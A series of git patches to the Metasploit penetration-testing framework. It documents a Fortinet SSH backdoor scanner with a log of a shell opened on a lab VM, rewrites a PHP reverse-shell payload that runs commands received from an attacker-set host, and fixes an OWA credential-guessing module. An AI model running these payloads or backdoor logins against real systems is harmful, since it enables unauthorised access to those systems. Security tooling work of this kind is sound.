a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -93,6 +93,9 @@ class MetasploitModule < Msf::Auxiliary } start_session(self, info, ds_merge, false, shell.lsock) + + # XXX: Ruby segfaults if we don't remove the SSH socket + remove_socket(ssh.transport.socket) end def rport From a9d6845f25c661d19b325d32fa45e667b910c547 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 21:49:00 -0600 Subject: [PATCH 28/33] Add module doc --- .../scanner/ssh/fortinet_backdoor.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md diff --git a/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md new file mode 100644 index 0000000000..c1738306e8 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md @@ -0,0 +1,63 @@ +## Intro + +This module scans for the Fortinet SSH backdoor and creates sessions. + +## Setup + +1. `git clone https://github.com/nixawk/labs` +2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware +3. + +## Usage + +``` +msf5 > use auxiliary/scanner/ssh/fortinet_backdoor +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24 +rhosts => 192.168.212.0/24 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100 +threads => 100 +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run + +[*] Scanned 54 of 256 hosts (21% complete) +[+] 192.168.212.128:22 - Logged in as Fortimanager_Access +[*] Scanned 65 of 256 hosts (25% complete) +[*] Scanned 78 of 256 hosts (30% complete) +[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600 +[*] Scanned 104 of 256 hosts (40% complete) +[*] Scanned 141 of 256 hosts (55% complete) +[*] Scanned 154 of 256 hosts (60% complete) +[*] Scanned 180 of 256 hosts (70% complete) +[*] Scanned 205 of 256 hosts (80% complete) +[*] Scanned 240 of 256 hosts (93% complete) +[*] Scanned 256 of 256 hosts (100% complete) +[*] Auxiliary module execution completed +msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1 +[*] Starting interaction with 1... + +FortiGate-VM # get system status +Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4) +Virus-DB: 16.00560(2012-10-19 08:31) +Extended DB: 1.00000(2012-10-17 15:46) +Extreme DB: 1.00000(2012-10-17 15:47) +IPS-DB: 4.00345(2013-05-23 00:39) +IPS-ETDB: 0.00000(2000-00-00 00:00) +Serial-Number: FGVM00UNLICENSED +Botnet DB: 1.00000(2012-05-28 22:51) +License Status: Evaluation license expired +Evaluation License Expires: Thu Jan 28 13:05:41 2016 +BIOS version: 04000002 +Log hard disk: Need format +Hostname: FortiGate-VM +Operation Mode: NAT +Current virtual domain: root +Max number of virtual domains: 10 +Virtual domains status: 1 in NAT mode, 0 in TP mode +Virtual domain configuration: disable +FIPS-CC mode: disable +Current HA mode: standalone +Branch point: 228 +Release Version Information: GA Patch 4 +System time: Wed Feb 21 13:13:43 2018 + +FortiGate-VM # +``` From 3f88e59516fffa349c78951db2905fc3a1be9bee Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 21 Feb 2018 21:54:27 -0600 Subject: [PATCH 29/33] handle Python 3.5/3.6 differences so we always have a UTF-8 string --- lib/msf/core/modules/external/python/metasploit/module.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py index 56b6781b23..6470effe0e 100644 --- a/lib/msf/core/modules/external/python/metasploit/module.py +++ b/lib/msf/core/modules/external/python/metasploit/module.py @@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts): def run(metadata, module_callback): - req = json.loads(os.read(0, 10000)) + req = json.loads(os.read(0, 10000).decode("utf-8")) if req['method'] == 'describe': rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}) elif req['method'] == 'run': From 7e665ab2879ac1bb36f267dd18b29636275b28e5 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 21 Feb 2018 21:54:58 -0600 Subject: [PATCH 30/33] check for extra libraries explicitly, fail gracefully --- .../auxiliary/scanner/ssl/bleichenbacher_oracle.py | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py index 0dfa7558d9..4b5bab7f6b 100755 --- a/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py +++ b/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py @@ -9,9 +9,13 @@ import os import ssl # extra modules -import gmpy2 -from cryptography import x509 -from cryptography.hazmat.backends import default_backend +dependencies_missing = False +try: + import gmpy2 + from cryptography import x509 + from cryptography.hazmat.backends import default_backend +except ImportError: + dependencies_missing = True from metasploit import module @@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal def run(args): + if dependencies_missing: + module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error') + return + target = (args['rhost'], int(args['rport'])) timeout = float(args['timeout']) cipher_handshake = cipher_handshakes[args['cipher_group']] From 77b3673e382e204c187e8bf4a5a75b64b395a22a Mon Sep 17 00:00:00 2001 From: Trevor Sibanda Date: Mon, 19 Feb 2018 15:49:46 +0200 Subject: [PATCH 31/33] Fix reverse_php_ssl infinite loop --- modules/payloads/singles/cmd/unix/reverse_php_ssl.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index d4740e5e39..bd65a0861e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 132 + CachedSize = 253 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions @@ -49,6 +49,6 @@ module MetasploitModule lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" + cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&" end end From d737f77b84feca8dbc7ecb02b0ac7e6a75ca3d4b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 22 Feb 2018 10:45:49 -0600 Subject: [PATCH 32/33] bump gems, lock ruby_smb for now --- Gemfile.lock | 26 +++++++++++++------------- metasploit-framework.gemspec | 2 +- 2 files changed, 14 insertions(+), 14 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4e5e66856a..0d502baa64 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -59,7 +59,7 @@ PATH rex-text rex-zip ruby-macho - ruby_smb + ruby_smb (= 0.0.18) rubyntlm rubyzip sqlite3 @@ -125,11 +125,11 @@ GEM railties (>= 3.0.0) faker (1.8.7) i18n (>= 0.7) - faraday (0.13.1) + faraday (0.14.0) multipart-post (>= 1.2, < 3) filesize (0.1.1) fivemat (1.3.5) - google-protobuf (3.5.1) + google-protobuf (3.5.1.2) googleapis-common-protos-types (1.0.1) google-protobuf (~> 3.0) googleauth (0.6.2) @@ -140,12 +140,12 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.8.3) + grpc (1.9.1) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.1) + i18n (0.9.5) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix @@ -155,7 +155,7 @@ GEM logging (2.2.2) little-plugger (~> 1.1) multi_json (~> 1.10) - loofah (2.1.1) + loofah (2.2.0) crass (~> 1.0.2) nokogiri (>= 1.5.9) memoist (0.16.0) @@ -167,7 +167,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-credential (2.0.12) + metasploit-credential (2.0.13) metasploit-concern metasploit-model metasploit_data_models @@ -194,7 +194,7 @@ GEM metasploit_payloads-mettle (0.3.7) method_source (0.9.0) mini_portile2 (2.3.0) - minitest (5.11.1) + minitest (5.11.3) mqtt (0.5.0) msgpack (1.2.2) multi_json (1.13.1) @@ -203,7 +203,7 @@ GEM net-ssh (4.2.0) network_interface (0.0.2) nexpose (7.2.0) - nokogiri (1.8.1) + nokogiri (1.8.2) mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) @@ -214,7 +214,7 @@ GEM pcaprub patch_finder (1.0.2) pcaprub (0.12.4) - pdf-reader (2.0.0) + pdf-reader (2.1.0) Ascii85 (~> 1.0.0) afm (~> 0.2.1) hashery (~> 2.0) @@ -229,7 +229,7 @@ GEM pry (0.11.3) coderay (~> 1.1.0) method_source (~> 0.9.0) - public_suffix (3.0.1) + public_suffix (3.0.2) rack (1.6.8) rack-test (0.6.3) rack (>= 1.0) @@ -320,7 +320,7 @@ GEM rspec-support (~> 3.7.0) rspec-rerun (1.1.0) rspec (~> 3.0) - rspec-support (3.7.0) + rspec-support (3.7.1) ruby-macho (1.1.0) ruby-rc4 (0.1.5) ruby_smb (0.0.18) @@ -348,7 +348,7 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.4) + tzinfo (1.2.5) thread_safe (~> 0.1) tzinfo-data (1.2018.3) tzinfo (>= 1.0.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6ab2274e03..4837f25845 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -127,7 +127,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'mqtt' spec.add_runtime_dependency 'net-ssh' spec.add_runtime_dependency 'bcrypt_pbkdf' - spec.add_runtime_dependency 'ruby_smb' + spec.add_runtime_dependency 'ruby_smb', '0.0.18' # # REX Libraries From e531dbc976d107946c1c6885607bcad019e6c471 Mon Sep 17 00:00:00 2001 From: James Barnett Date: Thu, 22 Feb 2018 11:25:35 -0600 Subject: [PATCH 33/33] Fix bug causing all logins to appear valid The headers we were looking for were a little too loose and were incorrectly identifying all responses as successful login attempts --- modules/auxiliary/scanner/http/owa_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index aa41da8017..9c335006d4 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary # No password change required moving on. # Check for valid login but no mailbox setup print_good("server type: #{res.headers["X-FEServer"]}") - if res.headers['location'] =~ /owa/ + if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/ print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'") report_cred( ip: res.peerinfo['addr'],